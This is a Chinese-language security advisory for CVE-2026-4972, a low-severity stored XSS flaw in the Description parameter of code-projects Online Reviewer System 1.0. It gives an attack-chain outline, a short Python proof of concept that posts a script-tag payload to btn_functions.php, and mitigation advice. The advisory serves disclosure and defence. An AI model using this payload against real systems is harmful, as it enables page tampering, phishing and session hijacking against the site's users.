CVE-2026-4972 CVSS 2.4 低危

CVE-2026-4972 Online Reviewer System存储型XSS漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4972

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

code-projects Online Reviewer System

漏洞概述

code-projects Online Reviewer System 1.0及以下版本存在一处安全漏洞。该漏洞位于/system/system/students/assessments/databank/btn_functions.php文件中，涉及对Description参数的处理。由于系统未对该参数实施有效的过滤机制，攻击者可植入恶意脚本导致存储型跨站脚本攻击。利用此漏洞需要高权限和用户交互，攻击可远程发起。目前相关利用代码已被公开披露，建议用户关注官方更新以防范潜在风险。

技术细节

该漏洞本质上属于存储型跨站脚本攻击（Stored XSS），存在于Online Reviewer System 1.0及更早版本中。漏洞根源在于开发人员在编写/system/system/students/assessments/databank/btn_functions.php文件时，未对用户提交的“Description”参数进行严格的安全过滤。攻击者首先需要获取系统的高权限账号（PR:H），然后在提交相关数据时，将恶意JavaScript代码注入到Description字段中。系统将这些数据未经转义直接存储。当其他用户（如管理员）访问并渲染该页面时（UI:R），浏览器将执行恶意脚本。尽管CVSS评分显示机密性影响为无（C:N），但攻击者可利用此漏洞破坏页面完整性（I:L），进行钓鱼攻击或恶意重定向。由于利用代码已公开，需及时修补。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标是运行1.0版本或更早版本的Online Reviewer System，并定位到btn_functions.php文件接口。

STEP 2

Authentication

由于漏洞需要高权限（PR:H），攻击者首先需要获取一个有效的教师或管理员账户凭据。

STEP 3

Exploitation

攻击者使用高权限账户登录，并在涉及Description参数的功能处（如题库描述）注入恶意JavaScript代码。

STEP 4

Delivery & Trigger

恶意载荷被存储在数据库中。当其他用户（特别是管理员）访问包含该描述的页面时（UI:R），载荷在浏览器端执行。

STEP 5

Impact

虽然机密性影响较低，但攻击者可利用此漏洞篡改页面内容（I:L），进行进一步的社会工程学攻击或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable file
target_url = "http://target-ip/system/system/students/assessments/databank/btn_functions.php"

# The 'Description' parameter is vulnerable to XSS
# Payload attempts to inject a script tag to execute JavaScript
xss_payload = '"><script>alert("XSS-Test-CVE-2026-4972")</script>'

# Data to be sent in the POST request
# Note: This attack requires High Privileges (PR:H)
payload_data = {
    "Description": xss_payload,
    "other_param": "value" 
}

try:
    response = requests.post(target_url, data=payload_data)
    if response.status_code == 200:
        print("Payload sent successfully. Check the assessment page for the alert box.")
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

code-projects Online Reviewer System <= 1.0

防御指南

临时缓解措施

在官方发布修复补丁之前，建议管理员严格限制系统访问权限，仅允许可信用户访问后台功能。同时，可以部署Web应用防火墙（WAF）规则，检测并拦截包含常见XSS特征（如<script>标签）的请求流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表